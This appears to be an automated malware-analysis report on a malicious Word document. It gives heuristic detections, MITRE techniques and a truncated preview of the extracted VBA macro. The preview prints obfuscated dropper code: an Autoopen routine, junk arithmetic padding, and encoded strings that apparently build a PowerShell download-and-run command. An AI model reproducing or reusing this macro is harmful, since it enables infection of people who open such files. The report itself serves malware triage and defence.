MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The 'OLE_VBA_SHELL' and 'OLE_VBA_AUTOOPEN' heuristics indicate the macro is designed to execute commands. The presence of the 'macros.bas' file further confirms the macro content. The macro's likely intent is to download and execute a second-stage payload, a common dropper behavior.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6546883-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6546883-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 154429 bytes |
SHA-256: 2e9f349833ae9e7c14fc0931c62c3edcc836996f54de8d0b287037bec8bb2f0d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "zQbYtKimGHzYRY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub ZBKaG(JzrUj)
TmoRTJ = jFUrRK
hcdmO = (KFwsLN / ofONMW / 40865 / Fix(zYFAY)) + 20285 - CLng(PFKsPE + CLng(76841)) + TEGqoO + 78004 * FFSAEr - CStr(13936) / vpwkDX / CLng(qhjpsh)
End Sub
Sub zmAwv(GfjrJ)
AvFJZY = jzaHDd
TQIIYv = (mHfAG / wXPIEb / 51421 / Fix(qkYGR)) + 90003 - CLng(VWfwU + CLng(499)) + qWXTNP + 26593 * aJTczI - CStr(65671) / CcCXc / CLng(kCGAMQ)
ADlvJj = llNLJD
Ompvs = (EcUScM / mUMMC / 94606 / Fix(ZGhhp)) + 53703 - CLng(jQOqNZ + CLng(40540)) + PRFTc + 62361 * jTSwV - CStr(12031) / ZBIMA / CLng(IFHFQz)
LFbOm = PFuHjU
BXOOs = (jQqNi / YkNKJ / 99359 / Fix(fIMdr)) + 7228 - CLng(fqLft + CLng(48617)) + fjlqtM + 20531 * HUrtN - CStr(27288) / BukHj / CLng(NotWKi)
End Sub
Sub tFLUII(AcTQmr)
Brmwq = ZoQvms
RusUi = (kVBJXk / UFZbU / 39910 / Fix(YLzGXU)) + 75085 - CLng(EpQhQ + CLng(11133)) + FkzhIH + 91785 * hPOlb - CStr(39011) / paRDi / CLng(zlwNq)
QMtpTz = zocmLh
LPrJjL = (oApQNb / IwCTR / 47227 / Fix(noZumi)) + 39611 - CLng(NoFWCu + CLng(65534)) + nifCcM + 8732 * GYXrp - CStr(49522) / tIzXb / CLng(PzdLN)
End Sub
Sub Autoopen()
On Error Resume Next
AKqYaa = OpmVC
jAnOLd = (nVLNEX / bYjCq / 27283 / Fix(DOQzw)) + 33363 - CLng(KdHmuv + CLng(83884)) + bjRic + 99445 * zdUDTd - CStr(82022) / kfoCf / CLng(XPOLAc)
falAJEHG (EaJbPK + ZHlGMZQEcZWrvj + zkHlZZ)
mitwH = UWHGt
fDUCX = (XmuCLc / StLzX / 6205 / Fix(GWkkVN)) + 86235 - CLng(XhTDi + CLng(6255)) + scikJC + 74770 * kTQto - CStr(50569) / WkCPF / CLng(TjjJj)
End Sub
Sub ONiHu(nBiRm)
bTCzRF = DiNKj
SzVZt = (bZnYH / LWtBZ / 53175 / Fix(zIolH)) + 37400 - CLng(bpfjB + CLng(4935)) + GbDSbp + 31654 * Uovuw - CStr(10071) / aCImFm / CLng(iLOFaZ)
uGWECF = pizmol
AqMVNs = (cXPzN / zrDVO / 81913 / Fix(ZhYpv)) + 263 - CLng(kTLzQA + CLng(5544)) + VCkMhX + 33811 * HHpqzw - CStr(60774) / XwMPSR / CLng(ZNEdJ)
PjMMS = AlBJC
wQiGK = (mojbSo / LDfKzc / 87050 / Fix(Wsbcd)) + 59220 - CLng(iqWoJH + CLng(38614)) + oTDOr + 40322 * nNYYHS - CStr(40502) / ChJzcY / CLng(djLJJ)
End Sub
Sub FiijrC(rwNBnt)
NEFXK = QUHAH
dhpWDi = (kijts / PdjFT / 14680 / Fix(iTsZb)) + 76392 - CLng(zclWiY + CLng(99546)) + JBZKT + 54003 * ViKNI - CStr(90397) / hOnsvJ / CLng(oQvPj)
End Sub
Attribute VB_Name = "IzMPTPqT"
Sub jJojZw(PNfDT)
WjldqQ = ldujQ
YRuus = (MziiE / jLaAi / 69426 / Fix(rNaddp)) + 48037 - CLng(wwCOET + CLng(47657)) + wUTmw + 13931 * oFhRHF - CStr(88997) / vKDZnz / CLng(QETiOD)
End Sub
Function ZHlGMZQEcZWrvj()
On Error Resume Next
PzsKli = OzhkSm
wXRVE = (HDBuk / HEPTUt / 83829 / Fix(phZwT)) + 30332 - CLng(jNWoV + CLng(21248)) + UjCJK + 83591 * LwzZI - CStr(43929) / ziMrad / CLng(PwUBoH)
htCiTZ = wqdqv
dCipip = (IGiTq / aipHE / 1527 / Fix(LuMKf)) + 78620 - CLng(sdsOr + CLng(16879)) + FziAz + 63856 * qaLirR - CStr(97889) / GjZqhT / CLng(pXKqQP)
jfUjd = WZzEj("vTKrU5jbo-webp+e'+'bperU5+rU5erU5+rU5bp+ebpn'+'ebr'+'U5+rU5prU5+rU5'+'(& = dsarU5+rU5dasnt7TrU5(( )rU5rU5nIoJ-]2,11,3[emAN.)rU5*rdM*r'+'U5 eLBaIRav(( . '(NGYv7", 84730 + 6 - 84730, 84730 + 151 - 84730)
NTciiU = LGETZU
BcnXZ = (WJpBb / WJGqJ / 31346 / Fix(LMsFJ)) + 76104 - CLng(EvdVWI + CLng(96782)) + ovXSr + 12464 * EdbGZ - CStr(96044) / EPuDA / CLng(HIWdj)
izQWpa = HmjTNf
wGQlcA = (LGWvzQ / QpLKZZ / 74622 / Fix(BWVkjs)) + 5226 - CLng(FuwlZ + CLng(54978)) + vnvAXq + 88068 * pKzqwU - CStr(18387) / GsIEtP / CLng(RwIARB)
TmYYdwc = WZzEj("0t;)rU5+rU5CDSt7TrU5+rU5()ebpmetI-e'+'ebp+ebpkebp+rU5+rU5ebpovnIebp(rU5+rU5&;)CDSt7rU5+rU5T ,rU5+'+'rU5)rU5+rU5(TU0gNGgSiGgrU5+rU5SrtSoTTU0.cfsarU5+rU5t7T(TU0elGgSIFdrU5+rU5aOGgSlnWGgSoDTrU5+9zL6Z8", 91843 + 7 - 91843, 91843 + 189 - 91843)
fKoBQ = iYPwH
jamCGl = (FssQYu / viEOpc / 47575 / Fix(imCvEn)) + 20032 - CLng(dMwzjR + CLng(59461)) + CPUwJm + 88837 * GkazU - CStr(867) / fXsvz / CLng(KjJvKO)
YtfbRX = VUOQCn
imjmju = (naTjk / Prijb / 88051 / Fix(aQrdrw)) + 66664 - CLng(Xh
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.